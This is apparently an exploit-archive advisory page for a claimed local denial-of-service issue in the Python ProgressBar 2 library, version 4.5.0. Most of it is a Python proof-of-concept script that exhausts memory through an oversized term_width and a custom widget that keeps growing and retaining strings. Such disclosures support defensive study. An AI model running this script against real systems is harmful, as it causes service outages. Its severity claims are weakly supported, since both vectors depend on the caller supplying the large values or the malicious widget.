ProgressBar 2 4.5.0 - Unbounded Resource Consumption DoS

2026.02.14

Credit: cardosource

Risk: Medium

Local: Yes

Remote: No

CVE: 2026-25828

CWE: N/A

#!/usr/bin/env python3
"""
Exploit Title: ProgressBar 2 4.5.0 - Unbounded Resource Consumption Denial of Service (DoS)

The ProgressBar library for Python (version 2 4.5.0 ) contains multiple
unbounded resource consumption vulnerabilities that allow a local attacker
to cause a Denial of Service (DoS). By providing overly large values for
parameters such as term_width or maxval, or by using a custom widget that
returns an excessively long string, an attacker can force the library to
allocate massive amounts of memory or perform CPU-intensive calculations,
leading to a process crash or system unresponsiveness.


Tested on: Linux, Windows (Python 3.x)
CVE: CVE-2026-25828
"""

import sys
import os
import time

# Add current directory to path to import the module
sys.path.insert(0, os.path.dirname(__file__))

try:
    from progressbar import ProgressBar
    from widgets import Percentage, ETA, Bar
    
    print("[*] ProgressBar 2 4.5.0 DoS Exploit")
    print("-" * 50)
    
    # Attack Vector 1: Memory exhaustion via term_width
    print("[1] Memory exhaustion via term_width=999999")
    pbar1 = ProgressBar(maxval=100, term_width=999999)
    pbar1.start()
    
    for i in range(5):
        pbar1.update((i + 1) * 20)
        print(f"Update {i+1} - Allocating ~1MB string")
        time.sleep(0.5)
    
    pbar1.finish()
    print("[SUCCESS] Memory consumption forced")
    
    # Attack Vector 2: Malicious widget with growing strings
    print("\n[2] Malicious widget with exponential string growth")
    
    from progressbar import widgets
    
    class DoSWidget(widgets.Widget):
        def __init__(self):
            self.size = 1000
            self.stored_strings = []  # Prevent garbage collection
        
        def update(self, pbar):
            # Double string size each time (up to 100KB)
            self.size = min(self.size * 2, 100000)
            huge_string = "A" * self.size
            self.stored_strings.append(huge_string)  # Keep reference
            return f"[{len(huge_string)} bytes]"
    
    pbar2 = ProgressBar(
        maxval=15,
        widgets=[DoSWidget(), ' ', widgets.Bar()]
    )
    
    pbar2.start()
    for i in range(15):
        pbar2.update(i + 1)
        print(f"Update {i+1} - String size: {1000 * (2 ** min(i, 7))} bytes")
        time.sleep(0.3)
    
    pbar2.finish()
    print("[SUCCESS] Progressive memory allocation demonstrated")
    
    print("\n[+] Exploit completed - Vulnerabilities confirmed")
    print("System may experience memory exhaustion or crash")
    
except MemoryError:
    print("\n[!] CRASH: System out of memory!")
    sys.exit(137)
except ImportError as e:
    print(f"\n[!] Error: {e}")
    print("Make sure progressbar files are in the current directory")
    sys.exit(1)
except Exception as e:
    print(f"\n[!] Unexpected error: {type(e).__name__}: {e}")
    sys.exit(1)

References:

https://pypi.org/project/progressbar/

https://files.pythonhosted.org/packages/19/24/3587e795fc590611434e4bcb9fbe0c3dddb5754ce1a20edfd86c587c0004/progressbar2-4.5.0.tar.gz

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

ProgressBar 2 4.5.0 - Unbounded Resource Consumption DoS

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.